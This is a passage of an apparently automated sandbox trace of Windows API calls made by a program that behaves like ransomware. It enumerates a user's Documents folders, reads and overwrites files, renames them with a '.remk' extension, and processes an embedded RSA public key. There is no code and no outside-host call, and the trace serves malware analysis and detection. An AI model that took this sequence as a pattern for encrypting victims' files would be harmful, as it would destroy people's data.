lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0235.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0235.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0235.327] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0235.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.327] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.327] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.327] CloseHandle (hObject=0x640) returned 1 [0235.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0235.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bd408 [0235.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185c10 | out: hHeap=0x630000) returned 1 [0235.332] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\ZsUtmR05.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\zsutmr05.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\ZsUtmR05.pptx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\zsutmr05.pptx.remk")) returned 1 [0235.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.333] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0235.334] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfec43cd0, ftCreationTime.dwHighDateTime=0x1d5e414, ftLastAccessTime.dwLowDateTime=0x78b6f80, ftLastAccessTime.dwHighDateTime=0x1d5e7f5, ftLastWriteTime.dwLowDateTime=0x78b6f80, ftLastWriteTime.dwHighDateTime=0x1d5e7f5, nFileSizeHigh=0x0, nFileSizeLow=0x17bd3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZsUtmR05.pptx", cAlternateFileName="ZSUTMR~1.PPT")) returned 0 [0235.335] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0235.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e730 | out: hHeap=0x630000) returned 1 [0235.335] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0235.335] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0235.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0235.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.341] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\") returned="R3pat\\" [0235.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba678 [0235.341] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\") returned="X0h6NwRPaRX5m\\" [0235.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.341] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0235.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cba8 [0235.341] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.342] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.342] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.342] PathFindFileNameW (pszPath="") returned="" [0235.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.342] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x488a5e80, ftCreationTime.dwHighDateTime=0x1d5dad3, ftLastAccessTime.dwLowDateTime=0x32b8f8d0, ftLastAccessTime.dwHighDateTime=0x1d5e499, ftLastWriteTime.dwLowDateTime=0x32b8f8d0, ftLastWriteTime.dwHighDateTime=0x1d5e499, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.342] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x488a5e80, ftCreationTime.dwHighDateTime=0x1d5dad3, ftLastAccessTime.dwLowDateTime=0x32b8f8d0, ftLastAccessTime.dwHighDateTime=0x1d5e499, ftLastWriteTime.dwLowDateTime=0x32b8f8d0, ftLastWriteTime.dwHighDateTime=0x1d5e499, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.342] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57e09b40, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0x231b6e10, ftLastAccessTime.dwHighDateTime=0x1d5db04, ftLastWriteTime.dwLowDateTime=0x231b6e10, ftLastWriteTime.dwHighDateTime=0x1d5db04, nFileSizeHigh=0x0, nFileSizeLow=0xf290, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JsGQxG.ots", cAlternateFileName="")) returned 1 [0235.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0235.342] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\JsGQxG.ots") returned=".ots" [0235.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\JsGQxG.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\r3pat\\jsgqxg.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.344] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=62096) returned 1 [0235.344] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.347] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf26a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.347] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.349] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xf290, lpOverlapped=0x0) returned 1 [0235.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.351] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.351] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.351] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0235.352] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.352] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.352] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.352] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.352] GetLastError () returned 0x0 [0235.352] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.352] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0235.352] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.352] UuidToStringA (in: 